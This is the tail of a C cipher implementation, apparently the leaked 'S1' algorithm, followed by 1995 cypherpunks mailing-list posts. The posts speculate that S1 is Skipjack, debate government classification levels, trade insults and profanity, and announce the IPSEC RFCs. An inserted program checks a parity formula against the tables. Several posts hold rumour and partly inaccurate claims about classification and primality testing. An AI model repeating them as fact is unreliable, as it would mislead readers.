	G[0][167] = 00;
	G[0][168] = 00;
	G[0][169] = 01;
	G[0][170] = 00;
	G[0][171] = 00;
	G[0][172] = 01;
	G[0][173] = 01;
	G[0][174] = 00;
	G[0][175] = 01;
	G[0][176] = 01;
	G[0][177] = 00;
	G[0][178] = 00;
	G[0][179] = 01;
	G[0][180] = 00;
	G[0][181] = 00;
	G[0][182] = 01;
	G[0][183] = 01;
	G[0][184] = 00;
	G[0][185] = 01;
	G[0][186] = 01;
	G[0][187] = 00;
	G[0][188] = 00;
	G[0][189] = 01;
	G[0][190] = 00;
	G[0][191] = 00;
	G[0][192] = 01;
	G[0][193] = 01;
	G[0][194] = 00;
	G[0][195] = 01;
	G[0][196] = 01;
	G[0][197] = 00;
	G[0][198] = 00;
	G[0][199] = 01;
	G[0][200] = 00;
	G[0][201] = 00;
	G[0][202] = 01;
	G[0][203] = 01;
	G[0][204] = 00;
	G[0][205] = 01;
	G[0][206] = 01;
	G[0][207] = 00;
	G[0][208] = 00;
	G[0][209] = 01;
	G[0][210] = 00;
	G[0][211] = 00;
	G[0][212] = 01;
	G[0][213] = 01;
	G[0][214] = 00;
	G[0][215] = 01;
	G[0][216] = 01;
	G[0][217] = 00;
	G[0][218] = 00;
	G[0][219] = 01;
	G[0][220] = 00;
	G[0][221] = 00;
	G[0][222] = 01;
	G[0][223] = 01;
	G[0][224] = 00;
	G[0][225] = 01;
	G[0][226] = 01;
	G[0][227] = 00;
	G[0][228] = 00;
	G[0][229] = 01;
	G[0][230] = 00;
	G[0][231] = 00;
	G[0][232] = 01;
	G[0][233] = 01;
	G[0][234] = 00;
	G[0][235] = 01;
	G[0][236] = 01;
	G[0][237] = 00;
	G[0][238] = 00;
	G[0][239] = 01;
	G[0][240] = 00;
	G[0][241] = 00;
	G[0][242] = 01;
	G[0][243] = 01;
	G[0][244] = 00;
	G[0][245] = 01;
	G[0][246] = 01;
	G[0][247] = 00;
	G[0][248] = 00;
	G[0][249] = 01;
	G[0][250] = 00;
	G[0][251] = 00;
	G[0][252] = 01;
	G[0][253] = 01;
	G[0][254] = 00;
	G[0][255] = 01;
	G[1][0] = 00;
	G[1][1] = 01;
	G[1][2] = 01;
	G[1][3] = 00;
	G[1][4] = 01;
	G[1][5] = 00;
	G[1][6] = 00;
	G[1][7] = 01;
	G[1][8] = 00;
	G[1][9] = 01;
	G[1][10] = 01;
	G[1][11] = 00;
	G[1][12] = 01;
	G[1][13] = 00;
	G[1][14] = 00;
	G[1][15] = 01;
	G[1][16] = 01;
	G[1][17] = 00;
	G[1][18] = 00;
	G[1][19] = 01;
	G[1][20] = 00;
	G[1][21] = 01;
	G[1][22] = 01;
	G[1][23] = 00;
	G[1][24] = 01;
	G[1][25] = 00;
	G[1][26] = 00;
	G[1][27] = 01;
	G[1][28] = 00;
	G[1][29] = 01;
	G[1][30] = 01;
	G[1][31] = 00;
	G[1][32] = 00;
	G[1][33] = 01;
	G[1][34] = 01;
	G[1][35] = 00;
	G[1][36] = 01;
	G[1][37] = 00;
	G[1][38] = 00;
	G[1][39] = 01;
	G[1][40] = 00;
	G[1][41] = 01;
	G[1][42] = 01;
	G[1][43] = 00;
	G[1][44] = 01;
	G[1][45] = 00;
	G[1][46] = 00;
	G[1][47] = 01;
	G[1][48] = 01;
	G[1][49] = 00;
	G[1][50] = 00;
	G[1][51] = 01;
	G[1][52] = 00;
	G[1][53] = 01;
	G[1][54] = 01;
	G[1][55] = 00;
	G[1][56] = 01;
	G[1][57] = 00;
	G[1][58] = 00;
	G[1][59] = 01;
	G[1][60] = 00;
	G[1][61] = 01;
	G[1][62] = 01;
	G[1][63] = 00;
	G[1][64] = 00;
	G[1][65] = 01;
	G[1][66] = 01;
	G[1][67] = 00;
	G[1][68] = 01;
	G[1][69] = 00;
	G[1][70] = 00;
	G[1][71] = 01;
	G[1][72] = 00;
	G[1][73] = 01;
	G[1][74] = 01;
	G[1][75] = 00;
	G[1][76] = 01;
	G[1][77] = 00;
	G[1][78] = 00;
	G[1][79] = 01;
	G[1][80] = 01;
	G[1][81] = 00;
	G[1][82] = 00;
	G[1][83] = 01;
	G[1][84] = 00;
	G[1][85] = 01;
	G[1][86] = 01;
	G[1][87] = 00;
	G[1][88] = 01;
	G[1][89] = 00;
	G[1][90] = 00;
	G[1][91] = 01;
	G[1][92] = 00;
	G[1][93] = 01;
	G[1][94] = 01;
	G[1][95] = 00;
	G[1][96] = 00;
	G[1][97] = 01;
	G[1][98] = 01;
	G[1][99] = 00;
	G[1][100] = 01;
	G[1][101] = 00;
	G[1][102] = 00;
	G[1][103] = 01;
	G[1][104] = 00;
	G[1][105] = 01;
	G[1][106] = 01;
	G[1][107] = 00;
	G[1][108] = 01;
	G[1][109] = 00;
	G[1][110] = 00;
	G[1][111] = 01;
	G[1][112] = 01;
	G[1][113] = 00;
	G[1][114] = 00;
	G[1][115] = 01;
	G[1][116] = 00;
	G[1][117] = 01;
	G[1][118] = 01;
	G[1][119] = 00;
	G[1][120] = 01;
	G[1][121] = 00;
	G[1][122] = 00;
	G[1][123] = 01;
	G[1][124] = 00;
	G[1][125] = 01;
	G[1][126] = 01;
	G[1][127] = 00;
	G[1][128] = 00;
	G[1][129] = 01;
	G[1][130] = 01;
	G[1][131] = 00;
	G[1][132] = 01;
	G[1][133] = 00;
	G[1][134] = 00;
	G[1][135] = 01;
	G[1][136] = 00;
	G[1][137] = 01;
	G[1][138] = 01;
	G[1][139] = 00;
	G[1][140] = 01;
	G[1][141] = 00;
	G[1][142] = 00;
	G[1][143] = 01;
	G[1][144] = 01;
	G[1][145] = 00;
	G[1][146] = 00;
	G[1][147] = 01;
	G[1][148] = 00;
	G[1][149] = 01;
	G[1][150] = 01;
	G[1][151] = 00;
	G[1][152] = 01;
	G[1][153] = 00;
	G[1][154] = 00;
	G[1][155] = 01;
	G[1][156] = 00;
	G[1][157] = 01;
	G[1][158] = 01;
	G[1][159] = 00;
	G[1][160] = 00;
	G[1][161] = 01;
	G[1][162] = 01;
	G[1][163] = 00;
	G[1][164] = 01;
	G[1][165] = 00;
	G[1][166] = 00;
	G[1][167] = 01;
	G[1][168] = 00;
	G[1][169] = 01;
	G[1][170] = 01;
	G[1][171] = 00;
	G[1][172] = 01;
	G[1][173] = 00;
	G[1][174] = 00;
	G[1][175] = 01;
	G[1][176] = 01;
	G[1][177] = 00;
	G[1][178] = 00;
	G[1][179] = 01;
	G[1][180] = 00;
	G[1][181] = 01;
	G[1][182] = 01;
	G[1][183] = 00;
	G[1][184] = 01;
	G[1][185] = 00;
	G[1][186] = 00;
	G[1][187] = 01;
	G[1][188] = 00;
	G[1][189] = 01;
	G[1][190] = 01;
	G[1][191] = 00;
	G[1][192] = 00;
	G[1][193] = 01;
	G[1][194] = 01;
	G[1][195] = 00;
	G[1][196] = 01;
	G[1][197] = 00;
	G[1][198] = 00;
	G[1][199] = 01;
	G[1][200] = 00;
	G[1][201] = 01;
	G[1][202] = 01;
	G[1][203] = 00;
	G[1][204] = 01;
	G[1][205] = 00;
	G[1][206] = 00;
	G[1][207] = 01;
	G[1][208] = 01;
	G[1][209] = 00;
	G[1][210] = 00;
	G[1][211] = 01;
	G[1][212] = 00;
	G[1][213] = 01;
	G[1][214] = 01;
	G[1][215] = 00;
	G[1][216] = 01;
	G[1][217] = 00;
	G[1][218] = 00;
	G[1][219] = 01;
	G[1][220] = 00;
	G[1][221] = 01;
	G[1][222] = 01;
	G[1][223] = 00;
	G[1][224] = 00;
	G[1][225] = 01;
	G[1][226] = 01;
	G[1][227] = 00;
	G[1][228] = 01;
	G[1][229] = 00;
	G[1][230] = 00;
	G[1][231] = 01;
	G[1][232] = 00;
	G[1][233] = 01;
	G[1][234] = 01;
	G[1][235] = 00;
	G[1][236] = 01;
	G[1][237] = 00;
	G[1][238] = 00;
	G[1][239] = 01;
	G[1][240] = 01;
	G[1][241] = 00;
	G[1][242] = 00;
	G[1][243] = 01;
	G[1][244] = 00;
	G[1][245] = 01;
	G[1][246] = 01;
	G[1][247] = 00;
	G[1][248] = 01;
	G[1][249] = 00;
	G[1][250] = 00;
	G[1][251] = 01;
	G[1][252] = 00;
	G[1][253] = 01;
	G[1][254] = 01;
	G[1][255] = 00;
}


static u_char f(int table, int value)
{
	if ((table<0) || (table>3) || (value<0) || (value>255)) {
		fprintf(stderr,"\n\nF TABLE EXCEPTION %x %x\n\n",table,value);
		exit(1001);
	}
	return F[table][value];
}


static u_char g(int table, int value)
{
	if ((table<0) || (table>2) || (value<0) || (value>255)) {
		fprintf(stderr,"\n\nG TABLE EXCEPTION %x %x\n\n",table,value);
		exit(1001);
	}
	return G[table][value];
}


/* TOP SECRET                                                    */
/* See label file for codeword restrictions                      */





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Wed, 9 Aug 95 17:59:48 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <199508092259.PAA10092@jobe.shell.portal.com>
Message-ID: <UAA08495.199508100059@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199508092259.PAA10092@jobe.shell.portal.com>, Hal writes:
>I suppose the unstated implication is that this might be Skipjack.

I don't suppose anyone has access to Skipjack to verify or
refute this claim?

[...much interesting analysis deleted...]
>                                           In addition to the points
>mentioned it is curious that the G arrays are initialized with a list of
>256 values rather than taking advantage of the apparent regularities
>noted.

It is fairly simple to cut & paste 10 values ~25 times, it is harder
to write and verify code to initialize the array.

More interesting is that Gx[i % 10] is faster than a straight index
on many systems (anything you could expect cache line conflicts or
cache capacity overfills on, and supports a modulus significantly
faster than the first few parts of the memory hierarchy).

Also note that the code may have been written from a disassembled
binary rather than a hardware spec.

[...]
>Hal Finney
>hfinney@shell.portal.com
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 9 Aug 95 21:05:00 PDT
To: hfinney@shell.portal.com
Subject: Re:  "S1" encryption system
Message-ID: <199508100403.VAA20160@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, yet another correction: the G1 box, G[1][i], is parity(i&0x17),
not parity(i) as I said, where parity is 0 or 1 depending on whether its
argument has an even or odd number of 1 bits.  I have checked via a
small program that this is correct and that the earlier formula I
posted for G0 is correct.

Hal
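
The check described in the message above can be rerun against the listing itself. The C program below is an added example, not code from any message in this thread: it tests G[1][i] against parity(i & 0x17) and measures the period of each G table. The two string constants are the G[0] and G[1] values transcribed from the listing earlier in the thread; the function names are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* G[0][0..255] transcribed from the listing, one character per entry
   ('0' for 00, '1' for 01). */
static const char G0_LISTING[] =
    "0011011001" "0011011001" "0011011001" "0011011001" "0011011001"
    "0011011001" "0011011001" "0011011001" "0011011001" "0011011001"
    "0011011001" "0011011001" "0011011001" "0011011001" "0011011001"
    "0011011001" "0011011001" "0011011001" "0011011001" "0011011001"
    "0011011001" "0011011001" "0011011001" "0011011001" "0011011001"
    "001101";

/* G[1][0..255] transcribed from the listing, same encoding. */
static const char G1_LISTING[] =
    "01101001" "01101001" "10010110" "10010110"
    "01101001" "01101001" "10010110" "10010110"
    "01101001" "01101001" "10010110" "10010110"
    "01101001" "01101001" "10010110" "10010110"
    "01101001" "01101001" "10010110" "10010110"
    "01101001" "01101001" "10010110" "10010110"
    "01101001" "01101001" "10010110" "10010110"
    "01101001" "01101001" "10010110" "10010110";

/* 1 if x has an odd number of 1 bits, 0 if even. */
static int parity(unsigned x)
{
    int p = 0;
    while (x) {
        p ^= 1;
        x &= x - 1;          /* clear the lowest set bit */
    }
    return p;
}

/* Number of entries i where listing[i] != parity(i & mask).
   Returns -1 if the listing does not hold exactly 256 entries. */
static int mismatches(const char *listing, unsigned mask)
{
    int i, bad = 0;

    if (strlen(listing) != 256)
        return -1;
    for (i = 0; i < 256; i++)
        if (listing[i] - '0' != parity((unsigned)i & mask))
            bad++;
    return bad;
}

/* Smallest p such that listing[i] == listing[i + p] for every i with
   i + p < 256. Returns 256 if no shorter period exists, -1 on bad length. */
static int smallest_period(const char *listing)
{
    int p, i;

    if (strlen(listing) != 256)
        return -1;
    for (p = 1; p < 256; p++) {
        for (i = 0; i + p < 256; i++)
            if (listing[i] != listing[i + p])
                break;
        if (i + p == 256)
            return p;
    }
    return 256;
}

int main(void)
{
    printf("G1 vs parity(i & 0x17): %d mismatches\n",
           mismatches(G1_LISTING, 0x17));
    printf("G1 vs parity(i):        %d mismatches\n",
           mismatches(G1_LISTING, 0xff));
    printf("G0 period: %d\n", smallest_period(G0_LISTING));
    printf("G1 period: %d\n", smallest_period(G1_LISTING));
    return 0;
}
```

Against the transcribed tables, parity(i & 0x17) matches G1 on all 256 entries while plain parity(i) misses on 128 of them. The measured periods are 10 for G0 and 32 for G1.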




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Wed, 9 Aug 95 18:05:40 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <199508100000.UAA07792@crypto.com>
Message-ID: <9508100105.AA11391@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On a fair number of occasions I have been told that federal type folks
have made statements to the effect that there is no such thing as a "TOP
SECRET" classification of US government docs. Since really secret things
tend to get neither confirmed nor denied, I am inclined to believe this.
Thus SECRET is the top classification in today's government/military. If
anybody knows otherwise I would be interested in the information.

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Wed, 9 Aug 95 18:19:47 PDT
To: cypherpunks@toad.com
Subject: Re: this looked like it might be interesting
In-Reply-To: <199508091852.UAA23821@utopia.hacktic.nl>
Message-ID: <m0sgM6l-000vpPC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Hmm.. This is interesting indeed.  It is a 32-round cipher operating
on a 64-bit block.  It has an 80-bit key with a 16-bit cryptographic
checkword.  This seems a lot like a certain hardware-based encryption
system some TLA spooks were pushing about a year ago.

If this isn't Skipjack, someone sure went to a lot of trouble to make
it look like Skipjack.  It's also possible that it is an early development
version of what later became Skipjack/Clipper.  It is dated February 1989
and July 1991, which would be consistent with NSA's claim that they had
been working on Skipjack for about 5 years.  It also mentions a "S-2"
revision.  It'd be interesting to try to see if it will interoperate with
a real clipper chip, but I wouldn't bet on it.

Hal Finney noticed that the coding style seems sloppy or amateurish.
This is probably just an attempt by the programmer to hide his tracks.
The RC4 stuff also had unnecessary operations in it, presumably for the
same reason.

Hal also comments on the use of XOR instead of bit permutations as in
DES, and the use of 8-bit table sizes, which would make a software
implementation easier.  This is odd, considering that the algorithm
purports to be designed for hardware.  However, NSA did say that part
of the clipper algorithm was in software, which was designed to be
erased if the chip was tampered with...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 9 Aug 95 18:08:53 PDT
To: solman@mit.edu
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <9508100105.AA11391@ua.MIT.EDU>
Message-ID: <199508100116.VAA08345@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>On a fair number of occasions I have been told that federal type folks
>have made statements to the effect that there is no such thing as a "TOP
>SECRET" classification of US government docs. Since really secret things
>tend to get neither confirmed nor denied, I am inclined to believe this.
>Thus SECRET is the top classification in today's government/military. If
>anybody knows otherwise I would be interested in the information.
>
>JWS

Well, I don't hold (and have never held) a clearance, but I've seen
declassified/sanitized documents that have crossed out "TOP SECRET"
markings all over them.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 9 Aug 95 21:22:48 PDT
To: cypherpunks@toad.com
Subject: Re:  "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <199508100421.VAA22301@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


A couple of people have indicated that they did not see the original
posting.  I changed the subject heading in my followup.  The original
message was posted under the subject title, "this looked like it might
be interesting".  At least one person had commented on the similarity
to Skipjack which is what prompted me to look at it a little more
closely.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Wed, 9 Aug 95 19:37:30 PDT
To: gt7508b@prism.gatech.edu
Subject: Re: "S1" encryption system (was: this looked like it might be interesting) (fwd)
In-Reply-To: <199508100215.WAA05968@acmex.gatech.edu>
Message-ID: <m0sgNPH-001gBTC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


PHrEaK! wrote:
> 
> Forwarded message:
> > On a fair number of occasions I have been told that federal type folks
> > have made statements to the effect that there is no such thing as a "TOP
> > SECRET" classification of US government docs. Since really secret things
> > tend to get neither confirmed nor denied, I am inclined to believe this.
> > Thus SECRET is the top classification in today's government/military. If
> > anybody knows otherwise I would be interested in the information.
> > 
> > JWS
  
> In high school I was in JROTC and was put in charge of security for our
> battalion. I read the army's guides to physical security. These books
> were dated early 80's and late 70's, so the situation might have changed, 
> but I doubt it. They denoted three information security clearance levels.
> CLASSIFIED, SECRET, and TOP SECRET. If TOP SECRET doesn't exist now, it
> definitely did just a few years ago. 
                                                    _
Actually there is one other For Official Use Only (FOUO), not as bad a
penalty if these docs get out.


-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Wed, 9 Aug 95 18:35:44 PDT
To: KALLISTE@delphi.com
Subject: Re: Only 1/3 of Government Computers Down So Far
In-Reply-To: <01HTVAYUCH6W90PB08@delphi.com>
Message-ID: <199508100134.VAA03975@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



KALLISTE@delphi.com writes:
> 	Many people are interested in cryptology because they don't
> want the NSA (among others) invading their privacy.

So, the question is this: do people want to follow the standard "ooh,
lets shudder at the conspiracy theories" track, and fall flat on their
faces, or do they want to see cryptography implemented and widely
deployed?

The noise levels on this list have driven most of the important crypto
types off it. People like Phil Karn and Steve Bellovin, who actually
implement stuff, aren't here any more. Instead, we have a vast flood
of ciphergroupies who love to post the latest funny bit they found on
the net, discuss whether David Koresh was being unfairly persecuted,
and how many bits of toe lint they found last week.

What we used to have was the cafe where the politically motivated
cryptographers hung out and gossiped. Now we have an open sewer in
which the occasional pearl still floats, and the cryptographers are
mostly gone.

Those of us who want to discuss cryptography here have been displaced.
If your goal is to impede communication about cryptography, you've
admirably succeeded. You've cut off one more place where people were
discussing how to deploy real-world solutions.

Tim May is wrong. I don't care what you call a "cypherpunk" -- that's
your business. However, the useful people *are* the people who write
code, spend long hours working to get standards implemented, work
lobbying in Congress, etc. Those of you who just rant, like Tim, were
very useful two years ago, but it's getting rather thin listening to
you guys make it impossible to discuss real work while you blather.
(Sorry, Tim. However, as long as you are going to call me "abusive" I
might as well speak my mind. If you are going to do the time, might as
well do the crime.)

> The Foster story concerns the chief NSA privacy-invasion of modern
> times: spying on domestic banking transactions.  So it's relevant.

Actually, what you've been posting has been even below the standards
of journalistic integrity (i.e. few) that you find on a Pacifica radio
station.

I don't even care if all the conspiracies are real. Isn't what is out
in the open enough? If the invasions of privacy that the government
acknowledges and the crap like Clipper that they try to foist on us
isn't horrifying enough, what weak-assed conspiracy theory that
someone came up with while tripping is going to do it for you.
Reality is frightening enough. FINCEN is real. The NSA really spied on
people at least until the congressional hearings in the '70s. The
government really invades privacy every day. Why do I need crap?

> 	The Grand Inquisitor role is getting a little old.  So if
> you want to continue to play it, my response is:  Fuck Off.
> 
> -Orlin

Frankly, Orlin, I think you are, with respect to the goals we are
trying to advance here, a useless lump of flesh. I've spent about
$50,000 of my own money trying to make the internet safe for
root-eaters like yourself. I've spent months of my life struggling to
get RFCs out, and I'm spending most of this month locked in my
apartment writing code. Right now, we are coordinating an effort to
try to get IPSEC widely implemented in the next several months and
deployed by spring. What do you do, exactly, other than generate chaff
to make it impossible for any real work to be seen on the radar?

When people bring up real work, like cryptographic libraries or Wei's
stuff or the work I've been doing in the IETF and that sort of thing
people like Matt Blaze notice, and maybe Ray Cromwell and Hal Finney
(cypherpunks both, not ciphergroupies) try to discuss things, but the
folks like you basically drown everything out by making more noise
about random conspiracy garbage.

Frankly, if anyone is helping the NSA, it's you. They don't want to see
universally deployed crypto. You could be out trying to spread
cryptography by coding, by handing people crypto when they need it, or
any one of dozens of other things. Instead, what you are doing is
making it impossible for people to try to get work done.

I have no idea what you are like personally. Maybe you're a nice,
smart guy. Maybe you are really a useful person in your other life.
However, I don't think your posting more conspiracy tracts is
improving life as we know it.  You have become an impediment -- a lump
of rock in the highway. You aren't part of the solution -- you are
part of the problem.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Wed, 9 Aug 95 19:06:51 PDT
To: cypherpunks@toad.com
Subject: Re: This summer's special delivery?
In-Reply-To: <ac4eb0c9030210046e6c@[205.199.118.202]>
Message-ID: <199508100206.WAA08666@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> >Someone sent me (to my bell labs address) a copy of this this afternoon via
> >an anon server in the netherlands.

> I got a copy mailed to me directly as well. I don't know why he/she/it sent
> it me, but I got it.

Ditto for me. I haven't had time to examine it in detail yet, but...

My impulse is to assume it's a hoax but examine it in detail. Anyone
have a Tessera card to test it against?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Wed, 9 Aug 95 19:14:34 PDT
To: cypherpunks@toad.com
Subject: IPSEC goes to RFC
Message-ID: <199508100214.WAA28860@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



RFCs 1825, 1826, 1827, 1828, and 1829 came out today.

These RFCs describe in detail the IPSEC protocol, which is designed to
secure the internet from the ground up. IPSEC permits the
cryptographic encapsulation of all your IP traffic, which means all
your internet communications.

IPSEC is now a Proposed Standard.

Please read them and help us in the effort to universally deploy this
protocol.

Still to come will be a key management system. The current notion is
to store RSA keys in the DNS -- a proposal to do this made by Eastlake
and Kaufman has been accepted by the IETF. Eastlake is now working on
a certificate format that will be an alternative to X.509. The keys
will be used by a modified version of the STS protocol (a signed
Diffie-Hellman exchange) that is being worked on by Phil Karn -- the
key management system is to be called "Photuris" and is currently an
internet draft.

Again, *we need your help*. Cypherpunks write code. Help us make the
internet safe for personal privacy by contributing to this effort.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt7508b@prism.gatech.edu (PHrEaK!)
Date: Wed, 9 Aug 95 19:15:22 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting) (fwd)
Message-ID: <199508100215.WAA05968@acmex.gatech.edu>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
> On a fair number of occasions I have been told that federal type folks
> have made statements to the effect that there is no such thing as a "TOP
> SECRET" classification of US government docs. Since really secret things
> tend to get neither confirmed nor denied, I am inclined to believe this.
> Thus SECRET is the top classification in today's government/military. If
> anybody knows otherwise I would be interested in the information.
> 
> JWS
>  
In high school I was in JROTC and was put in charge of security for our
battalion. I read the army's guides to physical security. These books
were dated early 80's and late 70's, so the situation might have changed, 
but I doubt it. They denoted three information security clearance levels.
CLASSIFIED, SECRET, and TOP SECRET. If TOP SECRET doesn't exist now, it
definitely did just a few years ago. 

-- 
=-=-=-=-=-=-= Tom Cross AKA The White Ninja / Decius 6i5 */^\* -=-=-=-=-=-=-=-
-=-=-=-=-=- TWN615@mindvox.phantom.com  GT7508B@prism.gatech.edu =-=-=-=-=-=-=
=- "Government is not a reason, not an eloquence; it is a force. Like fire, =-
-=- it is a dangerous servant and a fearful master." -- George Washington -=-=



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Wed, 9 Aug 95 20:01:42 PDT
To: cypherpunks@toad.com
Subject: >actual< classification categories
Message-ID: <v02120d02ac4f2da4df4f@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


I have copies of declassified documents with the following markings:

        secret                 (1985)
        top secret             (1986)
        classified             (1984)
        confidential           (1985)
        eyes only              (1986)

Some have various combinations, such as:

        secret/sensitive
        top secret/sensitive
        eyes only/top secret/sensitive

This isn't a complete list, but it's better than idle speculation.

The vast majority of declassified paper documents that I've seen (not a
small number) have explicit statements regarding _who_ is allowed to see
it, _how_ they are allowed to move and/or distribute it, control #s and
copy #s, semicomprehensible strings of characters, and so on; many have
things like destruction instructions and expiry dates. More and more,
slight variations are being introduced into each version for purposes of
compartmentalization. It's conceivable that this is the source of the typo
Hal spotted, but I doubt it. The fact that specific instrux were relegated
to a separate "label file" seems very suspect; the fact that the warning
tag is tacked onto the end is maybe noteworthy--it's in a different format,
which is possibly odd, but it might've been put there for silly theatrical
purposes.
        Basically, "top secret" without further comment is James Bond
stuff, since in and of itself it doesn't tell those who need to know what
they need to know.
        My guess is that someone stuck the "top secret" stuff on the
beginning and end of something they found. But that doesn't make it a hoax,
necessarily.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 9 Aug 95 20:10:19 PDT
To: perry@piermont.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <199508100214.WAA28860@panix2.panix.com>
Message-ID: <199508100310.XAA11723@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry wrote:

| RFCs 1825, 1826, 1827, 1828, and 1829 came out today.
| 
| These RFCs describe in detail the IPSEC protocol, which is designed to
| secure the internet from the ground up. IPSEC permits the
| cryptographic encapsulation of all your IP traffic, which means all
| your internet communications.
| 
| IPSEC is now a Proposed Standard.

| Again, *we need your help*. Cypherpunks write code. Help us make the
| internet safe for personal privacy by contributing to this effort.

	How about posting a list of 'things that need doing?'  I
assume one is floating around, possibly even with time estimates?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 9 Aug 95 21:57:03 PDT
To: James Caldwell <jcaldwel@iquest.net>
Subject: Re: Classification levels (was: Re: "S1" encryption system (was: this looked like it might be interesting) (fwd))
In-Reply-To: <m0sgNPH-001gBTC@dorite1.iquest.net>
Message-ID: <Pine.3.89.9508092308.B21852-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 9 Aug 1995, James Caldwell wrote:

> PHrEaK! wrote:
> > 
> > In high school I was in JROTC and was put in charge of security for our
> > battalion. I read the army's guides to physical security. These books
> > were dated early 80's and late 70's, so the situation might have changed, 
> > but I doubt it. They denoted three information security clearance levels.
> > CLASSIFIED, SECRET, and TOP SECRET. If TOP SECRET doesn't exist now, it
> > definitely did just a few years ago. 
>                                                     _
> Actually there is one other For Official Use Only (FOUO), not as bad a
> penalty if these docs get out.
> 

I was in the USAF 1987-1990, Tenn ANG 1990-1.  Documents are classified 
to five levels:

EEFI:  Essential Elements of Friendly Information-- pieced together, 
documents containing EEFIs may compromise classified info.  Usually, 
documents containing EEFIs are classified FOUO, but it is not required.

FOUO:  Usually not considered damaging by themselves.  FOUO documents are 
not considered classified, per se.
CONFIDENTIAL:
SECRET:
TOP SECRET:  These three differ in a matter of degrees.  Secret/Top 
             Secret information may cost lives, or millions of $.

All TOP SECRET information is automatically given an SCI (Special 
Compartmentalized Information) Category, and placed on a NTK (Need To 
Know) only access.  Many of the SCI abbreviations are themselves 
classified TS.  (The only one I know is "Q"--Nuclear.)  Each time 
clearance is extended to a new SCI, a new security background check must 
be made.

If you have clearance Q, and you want to see the plans for the MX, you 
had better be able to demonstrate NTK (usually from orders).


And no--there is no way under the sun that TS is going to be removed any 
time soon.

Nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 9 Aug 95 22:01:42 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Prime Number Gen's.
In-Reply-To: <199508091413.KAA00112@clark.net>
Message-ID: <Pine.3.89.9508092321.C21852-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 9 Aug 1995, Ray Cromwell wrote:

> Nathan Zook wrote:
> > > don't have a GNU ftp site to hand.
> > > 
> > > There's a function
> > > 
> > > 	int mpz_probab_prime_p(mpnum, SURETY)
> > > 
> > > which returns true if the prime passes SURETY probabilistic prime tests.
> > > 
> > > I think if it passes say 25 tests, then there will be less than a
> > > 1/2^25 chance that it is not prime.
> > > 
> > > Also, on:
> > > 
> > > 	http://dcs.ex.ac.uk/~aba/rsa-keygen.html
> > > 
> > 
> > The proper thing to do is to then search for a number which demonstrates 
> > p is prime....
> 
>   And how do you do this? I'm not aware of any deterministic primality
> test which isn't at least as hard as factoring. P-1 factorial is such
> a number which could demonstrate P is prime (compute the gcd, check if
> they are relatively prime). Good luck computing it.
>  
> -Ray

Common, Ray!  floor(sqrt(p))! would work fine....  ;-)  Seriously, at 
least 1/4 of the numbers between p and 0 can prove that p is prime.  So you 
try for a while.  If you don't get it, you can flip back.

I apologize for being so vague.  I don't have the paper I read a couple 
years ago in front of me.  You might contact your local math department & 
ask...

Nathan
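
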